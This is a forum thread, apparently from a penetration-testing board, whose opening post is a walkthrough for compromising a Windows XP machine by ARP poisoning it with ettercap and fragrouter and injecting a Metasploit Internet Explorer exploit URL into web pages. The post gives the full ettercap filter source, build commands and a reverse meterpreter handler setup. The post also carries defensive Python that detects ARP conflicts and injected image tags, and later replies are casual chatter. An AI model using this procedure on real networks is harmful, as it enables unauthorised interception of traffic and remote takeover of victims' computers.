Page 1 of 2
Results 1 to 10 of 21

Thread: Using MITM attack to gain access to a box using Fragrouter, Metasploit and Ettercap filters


  1. #1
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Using MITM attack to gain access to a box using Fragrouter, Metasploit and Ettercap filters

    Hey again guys

    Here we go again!! In this tut I will try to explain how I used Metasploit to gain access to a Windows XP SP2 box using ettercap filters. A reason somebody might use this way to gain access is because there is no interaction with the victim.

    Once again I hold no responsibility for what people do with this information. DO NOT email me / PM me or post here asking any member of this forum how to use this attack against a real victim!

    Now let's begin

    First let's fire up Metasploit; we will use the nice and easy msfweb for this tut. Go to backtrack >> Penetration >> Metasploit framework3 >> msfweb

    Now load up a web browser and go to;

    http://127.0.0.1:55555

    And you should see Metasploit's web interface. Now do a search in exploits for "internet". For this tut I'm going to use the MS03-020 Internet Explorer Object Type exploit. You can use this one or try others. Select the target explorer and now we can choose a payload. This one's up to you, but for example I will use the windows/meterpreter/reverse_tcp payload. Now let's set up the hack. For SRVHOST input your own IP, and the rest is down to what payload you chose. For the example payload set LHOST to your IP too and then hit exploit.

    Next you should get a new screen containing
    Code:
    *Started reverse handler
    *Using URL: http://192.168.1.64:8080/qp7QmDBnn8q
    *Server started.
    *Exploit running as background job.
    *msf exploit(ms03_020_ie_objecttype) >

    Open kwrite and paste the url (in your screen lol not the post) and let's move on....

    Now let's set up our ettercap filter. You can make your own up or use mine below. In my filter I have chosen to attach my url to an "img src=" tag. This is because you can guarantee that every web site viewed by the victim is going to contain this tag. You can play with different filters and all that.

    First let's set up a tmp dir to store our crap lol

    Code:
    mkdir metafilter
    cd metafilter

    And now cut and paste my filter into kwrite:

    Code:
    ############################################################################
    #                                                                          #
    #  Metasploit -- metasploit.filter -- filter source file                   #
    #                                                                          #
    #  By DR_Gr33n. based on code from Irongeek                                #
    #                                                                          #
    #  This program is free software; you can redistribute it and/or modify    #
    #  it under the terms of the GNU General Public License as published by    #
    #  the Free Software Foundation; either version 2 of the License, or       #
    #  (at your option) any later version.                                     #
    #                                                                          #
    ############################################################################
    # Requests to port 80: strip Accept-Encoding so the server replies with
    # uncompressed HTML that the filter below can search and rewrite.
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
              # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    # Responses from port 80: rewrite every img tag so it loads the Metasploit url.
    # The page's original src value is left behind after the injected one.
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"paste your url here!!!\" ");
       replace("IMG SRC=", "IMG SRC=\"paste your url here!!!\" ");
       msg("Check Metasploit.\n");
    }

    Save it as metafilter.filter and close kwrite. Now let's build our filter .......

    Code:
    etterfilter metafilter.filter -o metafilter.ef

    Now we can start our attack.....

    Whoops, missed fragrouter ...

    Code:
    fragrouter -B1

    Start ettercap

    Select unified sniffing

    Sniff >> unified sniffing and select your network adaptor

    Now let's scan for our target and go to the host list.

    Hosts >> Scan for hosts
    &
    Hosts >> Host List

    Select your victims ip and hit the add to target button....

    Let's load our filter ...

    Filters >> Load a filter

    Browse through to our folder /root/metafilter and select our filter "metafilter.ef" and OK

    EDIT: lol @ purehate, yes I know this has been patched for a while. Let's not give the whole game away lol, think of it as thicko protection.

    Now let's start ARP poisoning the victim....

    Mitm >> Arp poisoning and tick the "Sniff remote connections" box and OK

    Then Start and Start Sniffing.

    Now watch the bottom screen of ettercap until you see "Check Metasploit", and go back to your Metasploit web browser.

    You should now have a session started if the hack has worked. If not try another payload or exploit.

    And you are done, pat yourself on the back and have fun !!!

    Hope I haven't made any mistakes; if I have, give me some abuse lol

    PS: can a moderator edit the title? I added dnsspoof, balls!
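    As an added defender-side example (my own code, not from the original post and not from the ettercap or Metasploit projects): the setup above leaves two artefacts on the wire. On the LAN, the gateway IP is suddenly answered by a second MAC, and the attacking MAC claims several IPs at once. In the HTTP responses, every <img> ends up pointing at the same foreign URL, with the page's own src value left dangling as a stray quoted string. The Python below checks for both over constructed sample data; the IPs, the MACs, the www.example.com page host and the 192.0.2.10 URL are placeholders I made up for the demo.

```python
"""Added example, not part of the original post: detect the two artefacts that an
ARP-poisoning MITM with an 'img src=' rewriting filter leaves behind.
Every input below is constructed for the demo."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# --- 1. ARP poisoning: one IP answered by several MACs, one MAC claiming several IPs ---

# Constructed passive-ARP log: (time, sender IP, sender MAC) as a LAN monitor would record it.
ARP_LOG = [
    ("10:00:01", "192.168.1.1",  "00:11:22:33:44:55"),   # real gateway (constructed MAC)
    ("10:00:02", "192.168.1.64", "aa:bb:cc:dd:ee:01"),   # attacking host from the post
    ("10:00:03", "192.168.1.77", "aa:bb:cc:dd:ee:02"),   # victim (constructed)
    ("10:05:17", "192.168.1.1",  "aa:bb:cc:dd:ee:01"),   # gateway IP now claimed by .64's MAC
    ("10:05:17", "192.168.1.77", "aa:bb:cc:dd:ee:01"),   # victim IP claimed by the same MAC
]


def detect_arp_poisoning(arp_log):
    """Return (ip_conflicts, multi_ip_macs).

    ip_conflicts:  {ip: [mac, ...]} for every IP seen with more than one MAC.
    multi_ip_macs: {mac: [ip, ...]} for every MAC that claimed more than one IP.
    Seen together they are the shape of a host inserting itself between victim and gateway.
    """
    macs_by_ip = defaultdict(list)
    ips_by_mac = defaultdict(list)
    for _ts, ip, mac in arp_log:
        if mac not in macs_by_ip[ip]:
            macs_by_ip[ip].append(mac)
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].append(ip)
    ip_conflicts = {ip: macs for ip, macs in macs_by_ip.items() if len(macs) > 1}
    multi_ip_macs = {mac: ips for mac, ips in ips_by_mac.items() if len(ips) > 1}
    return ip_conflicts, multi_ip_macs


# --- 2. HTTP response tampering: the 'img src=' rewrite ---
# Rewriting 'img src=' into 'img src="URL" ' points every image at URL and leaves the
# page's original src value behind as a quoted string that belongs to no attribute.

IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']([^"']*)["']""", re.IGNORECASE)
# a quoted string that follows whitespace and is not the value of any attribute
STRAY_QUOTED = re.compile(r"""\s(["'][^"'=<>]*["'])(?=[\s/>])""")

# Constructed HTML as the victim's browser would receive it after the filter ran.
TAMPERED_PAGE = (
    '<html><body>\n'
    '<img src="http://192.0.2.10:8080/EXAMPLE-INJECTED" "/images/logo.png" alt="Logo">\n'
    '<p>Welcome</p>\n'
    '<img src="http://192.0.2.10:8080/EXAMPLE-INJECTED" "/images/footer.png">\n'
    '</body></html>\n'
)
# The same page as the server actually sent it.
CLEAN_PAGE = TAMPERED_PAGE.replace('src="http://192.0.2.10:8080/EXAMPLE-INJECTED" ', 'src=')


def audit_img_tags(html, page_host):
    """One finding per <img>: its src, whether it points off the page's own host,
    and any stray quoted strings sitting in the tag."""
    findings = []
    for tag in IMG_TAG.findall(html):
        src_match = SRC_ATTR.search(tag)
        src = src_match.group(1) if src_match else None
        host = urlsplit(src).hostname if src else None
        findings.append({
            "src": src,
            "foreign": bool(host) and host != page_host,
            "stray": STRAY_QUOTED.findall(tag),
        })
    return findings


def looks_injected(html, page_host):
    """True when every <img> shares one foreign src and carries stray quoted text:
    the shape the rewrite produces, which no legitimate page would serve."""
    findings = audit_img_tags(html, page_host)
    if not findings:
        return False
    srcs = {f["src"] for f in findings}
    return (len(srcs) == 1
            and all(f["foreign"] for f in findings)
            and all(f["stray"] for f in findings))


if __name__ == "__main__":
    conflicts, multi = detect_arp_poisoning(ARP_LOG)
    print("IPs with more than one MAC:", conflicts)
    print("MACs claiming more than one IP:", multi)
    print("tampered page injected?", looks_injected(TAMPERED_PAGE, "www.example.com"))
    print("clean page injected?   ", looks_injected(CLEAN_PAGE, "www.example.com"))
```

    The ARP check is the one to run continuously (arpwatch does the same job for real); the HTML check belongs in a proxy or IDS that sees uncompressed responses, which is exactly what the Accept-Encoding zap guarantees the attacker, and therefore the defender, will see.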

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    I think I see where you're going with this, but you do know that that actual exploit has been patched for a while. I'll be interested to read the rest. I am currently sitting through a version of Camelot where Lou Diamond Phillips is the lead actor and I am excruciatingly bored.

  3. #3
    Member Primey's Avatar
    Join Date
    Sep 2007
    Posts
    126

    Default

    Lou Diamond Phillips is acting again!?

    ewwwww

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by Primey:
    Lou Diamond Phillips is acting again!?

    ewwwww
    I scored 23 autographed programs last night and they are getting ready to be on eBay. I cannot tell you how much useless rockstar crap I've sold to fund my computer and pentesting addiction.

    Anyway dr.green, I assumed you were gonna use the filter in that way. It's actually a cool attack but VERY dependent on a lot of variables, and it is kind of a pain to recompile the filter with every payload. Ahh well, great addition to the board.

  5. #5
    Member elazar's Avatar
    Join Date
    Sep 2007
    Posts
    217

    Default

    Quote Originally Posted by purehate:
    I cannot tell you how much useless rockstar crap I've sold to fund my computer and pentesting addiction.
    Amen brother, it's incredible what people will buy...
    dd if=/dev/urandom of=/mybrain

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by elazar:
    Amen brother, it's incredible what people will buy...
    Does that mean you want a program? LOL

  7. #7
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by Dr_GrEeN:
    PS: can a moderator edit the title? I added dnsspoof, balls!
    You do have this Phenomenal Cosmic Power. Access it via clicking the "Edit" button then hitting the "Go Advanced" button.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  8. #8
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Quote Originally Posted by Dr_GrEeN:
    PS: can a moderator edit the title? I added dnsspoof, balls!
    Can you give the full title you want it changed to.
    Quote Originally Posted by thorin:
    You do have this Phenomenal Cosmic Power. Access it via clicking the "Edit" button then hitting the "Go Advanced" button.
    That will only change the title of the posts within the thread and not the title of the thread itself.
    You need the "Phenomenal Cosmic Power" of a moderator at least to do that

  9. #9
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by balding_parrot:
    That will only change the title of the posts within the thread and not the title of the thread itself.
    You need the "Phenomenal Cosmic Power" of a moderator at least to do that
    It's his thread, he can edit the title of the first post the way I mentioned.

  10. #10
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Quote Originally Posted by Re@lity:
    Of course, this won't help ordinary members, but they can at least request a mod to change a title for them - At the moment I'm not aware of any other way for users to change their own thread titles. I don't think it's something everyone will want to be doing all the time though, so getting a mod to do it for them will probably suffice.
    Here is a partial quote from another thread where we were discussing this very thing.
